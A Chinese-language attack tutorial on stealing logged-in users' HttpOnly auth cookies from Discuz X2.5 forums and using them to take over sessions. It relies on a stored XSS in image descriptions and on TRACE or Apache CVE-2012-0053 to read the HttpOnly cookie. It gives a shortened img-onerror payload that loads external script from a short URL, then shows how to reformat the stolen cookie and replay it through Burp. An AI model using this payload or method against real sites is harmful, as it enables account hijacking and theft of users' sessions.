0×01 无法用获取的COOKIE登录分析

都说DISCUZ X2.5（以下简称DZ25）的COOKIE拿到了也没有办法登录，但是为什么呢？今天就来简单的看一下，我们登录一个DZ25的站，登陆之后看下COOKIE

在里面我们翻下，就会发现一个HTTPONLY的字段，还是AUTH，也就是登录用户，所以当然无法直接搞到完整COOKIE，残缺的COOKIE自然无法登录

0×02 获取完整COOKIE条件分析

大家知道，HTTPONLY是专门用来防止XSS的，但是不要直接放弃，我们知道低版本的AJAX利用TRANCE方法和APACHE有一个CVE-2012-0053漏洞，均可以获取HTTPONLY的COOKIE

文章链接：

那么我们利用的条件就清晰了：

1. 低版本的浏览器
2. “或者”APACHE服务器没有补CVE-2012-0053

0×03 DZ25跨站分析

我在DZ官网下载了最新的DZ25，发现唯一没有补的洞就是在描述中插入XSS

这样，当点击图片时候，就会触发XSS，如下

当然，只是ALERT是不够的，为了触发漏洞，我们必须引用外部的JS文件，因为无论哪个条件，都需要一段AJAX脚本

如果直接引用<script src=’http://www.xxx.com/1.js’></script>会发现无法加载

（因为与本文关系不大，为什么不能加载这里我就不写分析了）

那怎么办呢？

不要忘了，我们还有IMG标签

我们可以使用：

<img src=x onerror=”var s=createElement(‘script’);document.body.appendChild(s);s.src=’http://localhost/1.js’;”>

这样的代码来创建一个body里面的script（为什么要这样写我就不说了，总之是这样的）

但是写进去后我们发现，太长了……是的被DZ25截断了

那我们来改一改，将不需要的去掉，地址换成短网址结果如下：

<img src=x onerror=s=createElement(‘script’);body.appendChild(s);s.src=’http://t.cn/z12345G’;>

插入之后刚刚好

加载下试试

至此，我们已经可以让dz加载外部的js了

0×04 JS编写

这个我就给个样本吧，大家改改就是了

 

0×04 COOKIE搜集

我们来看看得到的COOKIE

自己写的……界面比较丑……

可以看到，AUTH字段很好的被包裹了进去

但是，这是JSON格式的，我们还要做点处理，

1.将”全部去掉

2.将：换成=

3.将，换成；

最终得到如下：

0×05 登录

我们打开BURP，这个东西是个神器，不用我说大家都会用吧？

选上cookie然后点edit

然后UPDATE一下

之后设置代理为burp，burp就会自动替换头中的cookie字段

然后看下效果~~~